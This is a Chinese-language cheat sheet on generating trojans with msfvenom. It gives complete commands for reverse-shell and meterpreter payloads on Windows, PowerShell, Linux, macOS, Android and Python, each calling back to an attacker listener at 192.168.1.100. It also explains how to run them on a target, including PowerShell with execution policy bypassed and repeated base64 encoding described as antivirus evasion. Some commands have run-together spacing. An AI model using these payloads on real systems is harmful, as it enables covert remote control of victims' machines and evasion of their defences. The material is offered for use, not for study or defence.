Msfvenom木马生成

工具介绍

Msfvenom：MSF的木马生成工具，替代了旧版的msfpayload和msfencode。

基本语法：

msfvenom[选项]-p[payload]lhost=[IP]lport=[端口]-f[格式]-o[输出文件]

Windows平台木马

32位Windows木马

msfvenom -a x86 --platform windows\-p windows/meterpreter/reverse_tcp\lhost=192.168.1.100\lport=4444\-f exe>msf.exe

参数详解：

• -a x86：指定32位架构
• --platform windows：目标平台
• -p：指定payload类型
• lhost：攻击者IP（反连地址）
• lport：监听端口
• -f exe：输出格式为可执行文件
• > msf.exe：输出文件名

64位Windows木马

msfvenom -p windows/x64/meterpreter/reverse_tcp\lhost=192.168.1.100\lport=4444\-f exe -o msf64.exe

关键差异：

• 不需要指定-a和--platform
• Payload路径：windows/x64/meterpreter/reverse_tcp
• 64位系统可兼容32位木马

PowerShell木马

msfvenom -a x86 --platform windows\-p windows/powershell_reverse_tcp\lhost=192.168.1.100\lport=4444\-e cmd/powershell_base64\-i3\-f raw -o msf.ps1

特点：

• -e cmd/powershell_base64：Base64编码
• -i 3：编码迭代3次（增强免杀）
• -f raw：输出为代码而非可执行文件
• .ps1：PowerShell脚本格式
• 适用于Windows 7及以上系统

执行方式：

# 在目标机器执行powershell.exe-ExecutionPolicy Bypass-File msf.ps1

Linux平台木马

msfvenom -a x86 --platform Linux\-p linux/x86/meterpreter/reverse_tcp\lhost=192.168.1.100\lport=4444\-f elf -o msf.elf

特点：

• -f elf：Linux可执行格式
• .elf：Executable and Linkable Format
• 可直接执行：chmod +x msf.elf && ./msf.elf

macOS平台木马

msfvenom -a x86 --platform osx\-p osx/x86/shell_reverse_tcp\lhost=192.168.1.100\lport=4444\-f macho -o msf.macho

特点：

• -f macho：Mach-O格式（macOS可执行文件）
• 适用于较旧版本的macOS
• 新版本macOS有Gatekeeper保护

Android平台木马

msfvenom -a x86 --platform Android\-p android/meterpreter/reverse_tcp\lhost=192.168.1.100\lport=4444\-f apk -o msf.apk

特点：

• -f apk：Android应用包格式
• 需要数字签名才能安装
• 较旧的Android版本更容易成功
• 需要用户手动安装并授予权限

数字签名工具： 需要Android开发环境中的签名工具。

Python木马

msfvenom -p python/meterpreter/reverse_tcp\lhost=192.168.1.100\lport=4444\-f raw -o msf.py

特点：

• -f raw：输出为Python代码
• 跨平台（Windows、Linux、macOS）
• 需要目标系统安装Python环境

执行方式：

python msf.py# 或python3 msf.py